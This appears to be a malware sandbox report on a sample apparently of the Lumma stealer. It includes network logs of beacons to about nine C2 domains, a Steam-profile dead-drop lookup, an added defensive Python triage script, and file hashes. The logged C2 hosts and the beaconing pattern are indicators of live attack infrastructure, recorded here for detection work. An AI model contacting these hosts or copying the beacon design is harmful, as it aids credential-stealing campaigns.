    server-timing: cfL4;desc="?proto=TCP&rtt=27477&min_rtt=26411&rtt_var=7351&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=585&delivery_rate=134121&cwnd=253&unsent_bytes=0&cid=836fe19478e693b8&ts=286&x=0"
  • Geo: US
    DNS
    steamcommunity.com
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    steamcommunity.com
    IN A
    Response
    steamcommunity.com
    IN A
    104.85.37.68
  • Geo: FR
    GET
    https://steamcommunity.com/profiles/76561199724331900
    Faq.com
    Remote address:
    104.85.37.68:443
    Request
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Fri, 17 Jan 2025 14:30:09 GMT
    Content-Length: 35603
    Connection: keep-alive
    Set-Cookie: sessionid=08d1896e8e74a5f32fad25ec; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
  • Geo: US
    DNS
    nikolay-romanov.su
    Faq.com
    Remote address:
    8.8.8.8:53
    Request
    nikolay-romanov.su
    IN A
    Response
  • 104.21.36.233:443
    https://twigbestug.shop/api
    tls, http
    Faq.com
    979 B
    4.5kB
    9
    9

    HTTP Request

    POST https://twigbestug.shop/api

    HTTP Response

    200
  • 104.21.49.103:443
    https://strivehelpeu.bond/api
    tls, http
    Faq.com
    981 B
    4.5kB
    9
    9

    HTTP Request

    POST https://strivehelpeu.bond/api

    HTTP Response

    200
  • 104.21.16.1:443
    https://crookedfoshe.bond/api
    tls, http
    Faq.com
    981 B
    4.5kB
    9
    9

    HTTP Request

    POST https://crookedfoshe.bond/api

    HTTP Response

    200
  • 172.67.185.74:443
    https://immolatechallen.bond/api
    tls, http
    Faq.com
    984 B
    4.5kB
    9
    9

    HTTP Request

    POST https://immolatechallen.bond/api

    HTTP Response

    200
  • 104.21.55.3:443
    https://stripedre-lot.bond/api
    tls, http
    Faq.com
    982 B
    4.4kB
    9
    9

    HTTP Request

    POST https://stripedre-lot.bond/api

    HTTP Response

    200
  • 104.21.96.1:443
    https://growthselec.bond/api
    tls, http
    Faq.com
    980 B
    4.4kB
    9
    9

    HTTP Request

    POST https://growthselec.bond/api

    HTTP Response

    200
  • 172.67.151.242:443
    https://jarry-deatile.bond/api
    tls, http
    Faq.com
    982 B
    4.5kB
    9
    9

    HTTP Request

    POST https://jarry-deatile.bond/api

    HTTP Response

    200
  • 172.67.140.28:443
    https://pain-temper.bond/api
    tls, http
    Faq.com
    980 B
    4.5kB
    9
    9

    HTTP Request

    POST https://pain-temper.bond/api

    HTTP Response

    200
  • 104.21.78.5:443
    https://jarry-fixxer.bond/api
    tls, http
    Faq.com
    981 B
    4.5kB
    9
    9

    HTTP Request

    POST https://jarry-fixxer.bond/api

    HTTP Response

    200
  • 104.85.37.68:443
    https://steamcommunity.com/profiles/76561199724331900
    tls, http
    Faq.com
    1.5kB
    42.9kB
    23
    36

    HTTP Request

    GET https://steamcommunity.com/profiles/76561199724331900

    HTTP Response

    200
  • 8.8.8.8:53
    YkrFgzgkdfBNvBRQ.YkrFgzgkdfBNvBRQ
    dns
    Faq.com
    79 B
    154 B
    1
    1

    DNS Request

    YkrFgzgkdfBNvBRQ.YkrFgzgkdfBNvBRQ

  • 8.8.8.8:53
    twigbestug.shop
    dns
    Faq.com
    61 B
    93 B
    1
    1

    DNS Request

    twigbestug.shop

    DNS Response

    104.21.36.233
    172.67.200.205

  • 8.8.8.8:53
    strivehelpeu.bond
    dns
    Faq.com
    63 B
    95 B
    1
    1

    DNS Request

    strivehelpeu.bond

    DNS Response

    104.21.49.103
    172.67.161.160

  • 8.8.8.8:53
    crookedfoshe.bond
    dns
    Faq.com
    63 B
    175 B
    1
    1

    DNS Request

    crookedfoshe.bond

    DNS Response

    104.21.16.1
    104.21.80.1
    104.21.64.1
    104.21.48.1
    104.21.96.1
    104.21.112.1
    104.21.32.1

  • 8.8.8.8:53
    immolatechallen.bond
    dns
    Faq.com
    66 B
    98 B
    1
    1

    DNS Request

    immolatechallen.bond

    DNS Response

    172.67.185.74
    104.21.32.87

  • 8.8.8.8:53
    stripedre-lot.bond
    dns
    Faq.com
    64 B
    96 B
    1
    1

    DNS Request

    stripedre-lot.bond

    DNS Response

    104.21.55.3
    172.67.143.194

  • 8.8.8.8:53
    growthselec.bond
    dns
    Faq.com
    62 B
    174 B
    1
    1

    DNS Request

    growthselec.bond

    DNS Response

    104.21.96.1
    104.21.16.1
    104.21.48.1
    104.21.32.1
    104.21.80.1
    104.21.64.1
    104.21.112.1

  • 8.8.8.8:53
    jarry-deatile.bond
    dns
    Faq.com
    64 B
    96 B
    1
    1

    DNS Request

    jarry-deatile.bond

    DNS Response

    172.67.151.242
    104.21.40.131

  • 8.8.8.8:53
    pain-temper.bond
    dns
    Faq.com
    62 B
    94 B
    1
    1

    DNS Request

    pain-temper.bond

    DNS Response

    172.67.140.28
    104.21.73.40

  • 8.8.8.8:53
    jarry-fixxer.bond
    dns
    Faq.com
    63 B
    95 B
    1
    1

    DNS Request

    jarry-fixxer.bond

    DNS Response

    104.21.78.5
    172.67.214.67

  • 8.8.8.8:53
    steamcommunity.com
    dns
    Faq.com
    64 B
    80 B
    1
    1

    DNS Request

    steamcommunity.com

    DNS Response

    104.85.37.68

  • 8.8.8.8:53
    nikolay-romanov.su
    dns
    Faq.com
    64 B
    125 B
    1
    1

    DNS Request

    nikolay-romanov.su
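
The HTTP records above repeat one shape nine times: a POST to /api with an 8-byte form-encoded body, the same Chrome/119 User-Agent claiming Windows NT 10.0 although the sandbox runs Windows 7 (so the string is hard-coded in the binary, not taken from the host), and a 200 carrying a fresh PHPSESSID from a Cloudflare-fronted host. The sample walks a .shop domain and then eight .bond domains in about 23 seconds; the extracted config in Malware Config above lists only the first of them. Only afterwards does it fetch a Steam profile page and resolve nikolay-romanov.su, which is consistent with Lumma's reported use of Steam profiles as a dead-drop resolver, though the report does not show what, if anything, was parsed from that page. The Python below is an added example, not code from the report or the malware: it runs those observations as checks over HTTP records transcribed from the report. The Cloudflare prefixes, the NT-version table and the body-size threshold are the author's assumptions, and since the request body itself is not shown, no check depends on its content.

```python
"""Network-side triage of the HTTP records in the Network section above.
Added example, not code from the sandbox or the malware. RECORDS is
transcribed from the report (response Date, request line, remote address,
User-Agent, Content-Type, Content-Length); the beacon heuristics, the
Cloudflare prefixes and the NT-version table are the author's assumptions."""
import ipaddress
import re
from collections import namedtuple

# Assumption: Cloudflare anycast prefixes covering the resolved C2 addresses.
CLOUDFLARE_PREFIXES = [ipaddress.ip_network("104.16.0.0/12"),
                       ipaddress.ip_network("172.64.0.0/13")]
# "Windows NT x.y" as a real browser on that OS would report it.
NT_VERSION = {"Windows 7": "6.1", "Windows 10": "10.0"}
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")

HttpRecord = namedtuple("HttpRecord", "when method host path remote_ip "
                        "user_agent content_type content_length",
                        defaults=("", -1))


def _post(when, host, ip):                # the report's /api POSTs all share these
    return HttpRecord(when, "POST", host, "/api", ip, UA,
                      "application/x-www-form-urlencoded", 8)


RECORDS = [
    _post("14:29:45", "twigbestug.shop", "104.21.36.233"),
    _post("14:29:46", "strivehelpeu.bond", "104.21.49.103"),
    _post("14:29:46", "crookedfoshe.bond", "104.21.16.1"),
    _post("14:29:47", "immolatechallen.bond", "172.67.185.74"),
    _post("14:29:47", "stripedre-lot.bond", "104.21.55.3"),
    _post("14:29:47", "growthselec.bond", "104.21.96.1"),
    _post("14:30:07", "jarry-deatile.bond", "172.67.151.242"),
    _post("14:30:08", "pain-temper.bond", "172.67.140.28"),
    _post("14:30:08", "jarry-fixxer.bond", "104.21.78.5"),
    HttpRecord("14:30:09", "GET", "steamcommunity.com",
               "/profiles/76561199724331900", "104.85.37.68", UA),
]


def seconds(hms):
    h, m, s = (int(x) for x in hms.split(":"))
    return h * 3600 + m * 60 + s


def ua_nt_version(ua):
    """The 'Windows NT x.y' token a real browser derives from the host OS."""
    m = re.search(r"Windows NT (\d+\.\d+)", ua)
    return m.group(1) if m else None


def behind_cloudflare(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_PREFIXES)


def is_lumma_style_beacon(r):
    """Tiny form-encoded POST to /api on a Cloudflare-fronted host. The report
    does not show the body, so the 8 bytes is only a size check here."""
    return (r.method == "POST" and r.path == "/api"
            and r.content_type == "application/x-www-form-urlencoded"
            and 0 <= r.content_length <= 16 and behind_cloudflare(r.remote_ip))


def triage(records, host_os):
    beacons = [r for r in records if is_lumma_style_beacon(r)]
    domains = []
    for r in beacons:                     # first-contact order, deduplicated
        if r.host not in domains:
            domains.append(r.host)
    tlds = {}
    for d in domains:
        tlds[d.rsplit(".", 1)[-1]] = tlds.get(d.rsplit(".", 1)[-1], 0) + 1
    uas = {r.user_agent for r in records}
    return {
        "beacon_count": len(beacons),
        "beacon_domains": domains,
        # Nine distinct hosts inside a few seconds is a built-in fallback
        # list being walked, not a user browsing.
        "beacon_span_seconds": (seconds(beacons[-1].when) - seconds(beacons[0].when)
                                if beacons else 0),
        "tld_counts": tlds,
        # One UA for every request, claiming an NT version the host does not
        # run: the string is hard-coded in the binary, not derived from the OS.
        "single_ua": len(uas) == 1,
        "ua_os_mismatch": any(ua_nt_version(u) != NT_VERSION[host_os] for u in uas),
        "other_requests": [(r.method, r.host + r.path)
                           for r in records if not is_lumma_style_beacon(r)],
    }
```

To use this on real proxy or sandbox logs, build one HttpRecord per request and call `triage(records, host_os)` with the OS the client actually runs. The domains themselves rotate between samples, so the signals that carry over are the burst of first-seen hosts hit with identical tiny POSTs and the User-Agent that disagrees with the host.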

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\740515\Faq.com

    Filesize

    1KB

    MD5

    240fec03a76839e0270b555f3e38cacd

    SHA1

    ea229454926296b4c1640b4e322e98fd0fa2057b

    SHA256

    833d2b85b0cc5b8d6d5327af78dbf7cb8122c3a67e2b26847ce4bc26b61ca6ec

    SHA512

    188a6a31163984674818580c546bc402bc74cc5ab7ceb9929beaa9ab4b94772b16eeef640d8f62000996ff06e532e8a35dc90f659727a2f06583bf6699e3ef70

  • C:\Users\Admin\AppData\Local\Temp\740515\b

    Filesize

    499KB

    MD5

    d32e4be5ef68ab91ac438377c929ccbb

    SHA1

    2a02bf4f8a145ea351a6ed726534d64f58decb63

    SHA256

    71635109b4e0d8d84e24456c0a39d4d04c2ca3130e46ced4f3a247116e0992da

    SHA512

    c72bd008e11263597adca77b595c08402baadf4f969168d9c9b9c2cfd1cf170d9e25f47027df9c3d544b75ca5d66b0fe84ccd7f640af3a9b705ac77b6a0cb398

  • C:\Users\Admin\AppData\Local\Temp\Ages

    Filesize

    60KB

    MD5

    668b4f85d16a36d1764aeb156cd7dba0

    SHA1

    da3638dd914367f163b7966187cb1c477f9141f1

    SHA256

    88dbcd42ebc88490c01ade9be8c1b69b505a2ff347dc1f72629fcd7c4fc1b9af

    SHA512

    036f9abd67b4efa84252368668c05ba937bc1c4ed0d51b01e929b4976cb1fea43fa022c31edaceedbb5effe7217b9f11539644af8861f7b92c23b81a93cdbe18

  • C:\Users\Admin\AppData\Local\Temp\Aurora

    Filesize

    23KB

    MD5

    198b05f46a6fd63ad6aa063c6b696dd9

    SHA1

    7e59d9d9ab208163e316ef6c8b614ba041dd8b79

    SHA256

    b78c248e2d30e5caa61b4276ac0943c5690277d5a4d25a3938ea3fc4c34ef61e

    SHA512

    e890d0709cbe4c8f9bbcf0a44d49fd16207e1b81780e8e52f7f1a3327fc13afff0952138562307f19e6099b653734a42e02acadd68049a1c61bb7202f583162d

  • C:\Users\Admin\AppData\Local\Temp\Barbara

    Filesize

    477KB

    MD5

    97995c5975a7fffda942c55ca2be8668

    SHA1

    652f0961d0162a6d26fef5478a33118473b0acd3

    SHA256

    44fba0dd56223e8678a4f18e496764c91f2706f94937f6c98a495ca3f14ffa7b

    SHA512

    4e30256aa77ba46ffab0e944efa86bea868e0f6083904f5bee019af507805da1716f60dd9e5f1bce953c937ec7e4bb353ddb58a8d3d487199eb77c708dd1fbeb

  • C:\Users\Admin\AppData\Local\Temp\Booty

    Filesize

    72KB

    MD5

    51756b538784e6843b0329c25bd8e2ad

    SHA1

    7eab446c1ffcbfbcc7d9fad920c035f071caaf71

    SHA256

    a9da18f002df4ce3421135b125fc3de1d1c36b101c9bd177871b839332fcce4f

    SHA512

    644a9680d578b9ddc1ab4bacfec2e33a40b5afc37f1309563aa3fcde97a745a8b20e7086075c86f03514c16def878d9999e2547e6ed264cf6d232f4d8dd50a49

  • C:\Users\Admin\AppData\Local\Temp\Cab314F.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Completion

    Filesize

    14KB

    MD5

    cf2e628b388f0952e0d4ceb48702eeb0

    SHA1

    27bd8f739c3c31d2b2781a2e25dd20df07f881f9

    SHA256

    550249fe4ef7e3ddee2c34901e342d1391118a80d77da2468ec00a64db1a4c86

    SHA512

    4d5ddc8c76a21d8a5bccbfaa4d449ee8109f4097d20caf7b92678ffc43af7b44479069bb22d86b47f008b7aae7bf94c6999b105166c519b30a441861472d6728

  • C:\Users\Admin\AppData\Local\Temp\Folder

    Filesize

    75KB

    MD5

    e98687da24867f8aa1b4fdb087c2d207

    SHA1

    080be55f2aab34d530f788cb3009fde5b3d6ada8

    SHA256

    c03404888337e8c3ae8f9188c59ca72b40786d16ab13d8856d0bf23a9aeaeea5

    SHA512

    f38323d5874f82f9f492b640ff05b01bb0947a4c89057e3f12e6c014842dc6bb37f7d8d61ea0b393dde7d56c07ea76b7d4fb4e869d1df5da0d155626b1027aaf

  • C:\Users\Admin\AppData\Local\Temp\Grenada

    Filesize

    106KB

    MD5

    a1d1d86203f66fcdb1b16d0632130cbe

    SHA1

    ad452738dd2785966aa3835bf39c3111878b4b02

    SHA256

    1ec4bf66966fb245e2e94b3310ad45068e9dc812bd842493243072eb6f4e2741

    SHA512

    b53543adeb912fae1ded8567efaf1f58cdb5d09a23d3ab1e4148af0f8aefacc3c5b6212d8cf45c57d92a3017733091b9d19a2ec88f9dd198b39a7606553db8e6

  • C:\Users\Admin\AppData\Local\Temp\Involves

    Filesize

    81KB

    MD5

    cad1517bf3622c591ad865c10a881fd3

    SHA1

    ae1a88ff20ec1269e8a4fb70044195fec3eb4543

    SHA256

    7423184d2c04d4de4d6e8e5a89d398979354a46d001f614386fea83aed785eeb

    SHA512

    f18b3b5a92348b20bb44e61312af7c4496e93c9a99112f4bd2cc1d8ee58c33f884ccdda6bcb7ed98b23790547c8fd6f8cc5a3eb35c23df83ac55c3479c557ab7

  • C:\Users\Admin\AppData\Local\Temp\Jake

    Filesize

    83KB

    MD5

    0b5a63a9bc69adfa2521ceb3dc56317a

    SHA1

    2ac104fd476f7c3e7478472273387887a4788dd9

    SHA256

    2325c49a1780daf4997f5e28bcc04839882e377a1cb54690ad90aea1eb18c314

    SHA512

    7908ca50d8f296e8f2ca70a154bb522de9bcd807ee4bf4061fb02c474a98a9f7cbbfa317b757d82f239cdb92b9ef18b7d665ea386da9ca62fb0b89d98871e8ad

  • C:\Users\Admin\AppData\Local\Temp\Landing

    Filesize

    125KB

    MD5

    2492f7bac8ec6420cfb739731ed8d1ea

    SHA1

    19a60a60febfc3ba9f2c8492022d3fd7ca4d5a57

    SHA256

    d3b8768dbc48489f154456a38e44a1395097bd4add1d8b3b850b2a6e8029015d

    SHA512

    f4d39aee6ea9abd1196d7d117d1773b510432596e7de397db1b3e1db0e04cc78700f15121cf4f62c0627b72f3128b9cd9b0ecd1381f39ed800cd592b919c5b66

  • C:\Users\Admin\AppData\Local\Temp\Listing

    Filesize

    49KB

    MD5

    a96cb9b1271fa65ba59063a1b14320c6

    SHA1

    da46610f8a15bf8b66f5253f606df257e3f0b187

    SHA256

    b2ea39a599b5cccc74af5cb19a7b62561bdbc2fd15adeeeba1610172a696296a

    SHA512

    3e33d3e05801cab2944246bf935c9528d1bc4e4426c94d1f570946bf84a85f56e1074d7eba6a57c6006f2a2b60f9aaa5eaf8828d01a379de3c90c369f0584807

  • C:\Users\Admin\AppData\Local\Temp\Master

    Filesize

    114KB

    MD5

    79f200aac919971c492936d85350b40f

    SHA1

    890ca8d984f7712a371121aa251c6ffc48408634

    SHA256

    6d1cac8ee0bdd4d41e675bc0dba1fea85e7663eb743bac84f089da7f4c9d8823

    SHA512

    31e3353514cb4eb7da1c7779663876d304548f174b63316e6a6558c4791e5ecab9198752c10b126c70aca1cdbf1705791591204b6cc9f740277d800432969dcc

  • C:\Users\Admin\AppData\Local\Temp\Postposted

    Filesize

    85KB

    MD5

    fc40c3b278730053254a9cd838056cb9

    SHA1

    9beabe0b138aa13d790cc9c2dc31810735afe674

    SHA256

    d5993664e88b8d6ead06134ea9b8594b3419ddde916a599e78d3711d07f71fb1

    SHA512

    36389245e9e97ad64c186189a56af5b6bc6f0688256ff492841c0e5ad8fbf011667d938e33f450238494c48441edf3d8c9523faf46f95d5a787368cdd8d0cf22

  • C:\Users\Admin\AppData\Local\Temp\Responding

    Filesize

    144KB

    MD5

    d4302d5ba1f5165ae0b808359a60fd06

    SHA1

    db84db1b34ad7c270f3fde6fc676a70ffa1584ad

    SHA256

    856aaee08962d5088c725ab2d80c674c8a685cf826b6d805dffd65a971037132

    SHA512

    3b68b434ed06be3ed67695e0eecf28070af28f1e0dcf5cdd98c58a30d8f165c741297d5efb66a937f222a39284719f8551e037e6b65289b3e0d6cab244008586

  • C:\Users\Admin\AppData\Local\Temp\Safe

    Filesize

    98KB

    MD5

    11dbdb44b37e311a23720f482d8bc43d

    SHA1

    359fee2e80090b400a820ea95571f003c99bd56f

    SHA256

    ab9496ef4bc1e6703145ae2b288d43601aab1e50080a87d45416f293993034c6

    SHA512

    d84d2f47bb60542f4e300f3ce6c6f9840d2cc2d7c0db8bc90241bcc868b9efdec9accc9e99d56840eb43b336ed5598d7dfab7c76d4a001c4a46d88e1fb6fdcd3

  • C:\Users\Admin\AppData\Local\Temp\Styles

    Filesize

    86KB

    MD5

    66076aea0aef9bfa535f1db293bffc97

    SHA1

    70c4391a36995c6e68d3dc91d8c0954d62437936

    SHA256

    96e7bc4a42e07d707561b4fe5621711b643d5b72d0c201e27e5391cb147ff16b

    SHA512

    ba1debe7d5b87e413f3ebbc169b2a732f4a20a88ad1f26c35ab25bca10c143505dcedc18c056a418e35e75da51a881a6b2fac42d1af40e7a9aa658a4633f5fe2

  • C:\Users\Admin\AppData\Local\Temp\Supports

    Filesize

    139KB

    MD5

    caca9d3d3db583ab8ffc53e433b1b983

    SHA1

    07adb80ffea889e9d8bb96f3295f7376094e63ec

    SHA256

    82100c989a49951f4f101e36ed8c5e0c2cef1dcda84ccfd4e90b13d4c111c92e

    SHA512

    21dae90c43531152dbb2b2386601231ce252c28bbbeca6562adbae9a7cd595ad01cef40be021ef117ce79560d4d42d5f110f898a5413fb7249e6a0ee33055678

  • C:\Users\Admin\AppData\Local\Temp\Tar3171.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\Valley

    Filesize

    1KB

    MD5

    3d5b388595b71d966122304d69c75123

    SHA1

    491fdd36f66dbcd0d643402ae6296321e6c9b2c8

    SHA256

    41027fc94a55b8a42dd8a36b7215caa51ced5f83aaccd3ede9bdb86a089a9390

    SHA512

    0d13127ea776aa1b945403d60201723bc10fa0b30bbda93fbd29cd542d3767e2925c446ce81c24ba8f672baf830e67f3c894db1406b4721e8aa984b2468ec74c

  • C:\Users\Admin\AppData\Local\Temp\Viral

    Filesize

    91KB

    MD5

    a5f244475586d32641f9ede8f51e72dc

    SHA1

    354824585979f55e9553dca370056b5d6bd71080

    SHA256

    353f3081e717538815bf91b281e7377f732d4a4d6f5c8b45a6d479d947f08aa7

    SHA512

    364d3c1ad10ab74a16238ce630f9f8224f0e054deb6ed52585b9c08dd2fcc90f78ee078416791744b739e9d668135c6bb754752feb68c8dc9f6e7b5fb9443ed7

  • \Users\Admin\AppData\Local\Temp\740515\Faq.com

    Filesize

    925KB

    MD5

    62d09f076e6e0240548c2f837536a46a

    SHA1

    26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

    SHA256

    1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

    SHA512

    32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

  • memory/2236-67-0x00000000038C0000-0x0000000003917000-memory.dmp

    Filesize

    348KB

  • memory/2236-69-0x00000000038C0000-0x0000000003917000-memory.dmp

    Filesize

    348KB

  • memory/2236-71-0x00000000038C0000-0x0000000003917000-memory.dmp

    Filesize

    348KB

  • memory/2236-70-0x00000000038C0000-0x0000000003917000-memory.dmp

    Filesize

    348KB

  • memory/2236-68-0x00000000038C0000-0x0000000003917000-memory.dmp

    Filesize

    348KB
